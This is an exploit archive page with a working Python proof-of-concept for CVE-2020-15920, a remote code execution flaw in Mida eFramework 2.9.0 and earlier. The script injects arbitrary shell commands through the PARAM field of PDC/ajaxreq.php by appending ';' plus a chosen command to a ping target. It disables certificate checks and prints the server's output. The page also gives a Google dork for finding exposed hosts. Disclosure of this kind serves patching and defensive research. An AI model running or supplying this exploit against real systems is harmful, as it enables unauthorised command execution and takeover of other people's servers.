Mida eFramework 2.9.0 Remote Code Execution

Mida eFramework 2.9.0 Remote Code Execution: Posted Aug 27, 2020; Authored by elbae; Mida eFramework version 2.9.0 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2020-15920; SHA-256 | 1d91860562323de0b96d48e3fab2bd5c3cff83336de0debd04431d028e64421a; Download | Favorite | View

Mida eFramework 2.9.0 Remote Code Execution

# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15920


#! /usr/bin/python3
# -*- coding: utf-8 -*-

import argparse
import requests
import subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def print_disclaimer():
   print("""
    ---------------------
    Disclaimer:
    1) For testing purpose only.
    2) Do not attack production environments.
    3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
    4) The author is not responsible for any possible harm caused by this
material.
    ---------------------""")


def print_info():
   print("""
[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
[*] Reference:
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability
(RCE) in PDC/ajaxreq.php
    Version\t< 2.9.0\t./CVE-2020-15920
http://192.168.1.60:8090/PDC/ajaxreq.php id
    Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php
id """)

def pwn(url,cmd):
   running = """
[*] Target URL: {0}
[*] Command: {1}
   """
   print(running.format(url,cmd))
   data = {
      "DIAGNOSIS":"PING",
      "PARAM":"127.0.0.1 -c 0; {0}".format(cmd)
   }
   r = requests.post(url,data=data,verify=False)
   line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"
   pretty_output = r.text.replace('<br>','\n')
   print(line+"\n{0}\n".format(pretty_output)+line)

def main():
   print_info()
   print_disclaimer()
   parser = argparse.ArgumentParser()
   parser.add_argument("target", type=str, help="the complete target URL")
   parser.add_argument("cmd", type=str, help="the command you want to run")
   args = parser.parse_args()
   pwn(args.target, args.cmd)

if __name__ == '__main__':
   main()

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Mida eFramework 2.9.0 Remote Code Execution

Mida eFramework 2.9.0 Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mida eFramework 2.9.0 Remote Code Execution

Share This

Mida eFramework 2.9.0 Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems